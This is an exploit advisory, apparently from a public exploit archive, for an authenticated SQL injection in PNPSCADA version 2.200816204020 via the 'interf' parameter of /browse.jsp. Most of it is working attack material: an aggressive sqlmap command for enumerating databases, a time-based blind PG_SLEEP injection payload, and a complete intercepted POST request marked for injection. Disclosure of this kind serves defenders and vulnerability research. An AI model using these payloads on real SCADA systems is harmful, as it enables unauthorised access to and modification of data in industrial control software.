# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)# Google Dork: -# Date: 2020-08-17# Exploit Author: İsmail ERKEK# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp# Version: 2.200816204020# Tested on: -1. Description:----------------------
PNPSCADA2.200816204020 allows SQL Injection via parameter 'interf'in/browse.jsp. Exploiting this issue could allow an attacker to compromise
the application, access or modify data,or exploit latent vulnerabilities
in the underlying database.2. Proof of Concept:----------------------
In Burpsuite intercept the request from one of the affected pages with'interf' parameter and save it like fuel.req Then run SQLmap to extract the
data from the database:
sqlmap -r req-pnp-browse.txt --risk=3--level=5--dbs --random-agent
3. Example payload:----------------------(time-based blind)
memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=988314. Burpsuite request:----------------------
POST /browse.jsp HTTP/1.1
Host:127.0.0.1
Accept-Encoding: gzip, deflate
Accept:*/*
Accept-Language: en
User-Agent: Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer:
http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
Content-Type: application/x-www-form-urlencoded
Content-Length:93
Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37
memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831
Best Regards.
Ek alanı
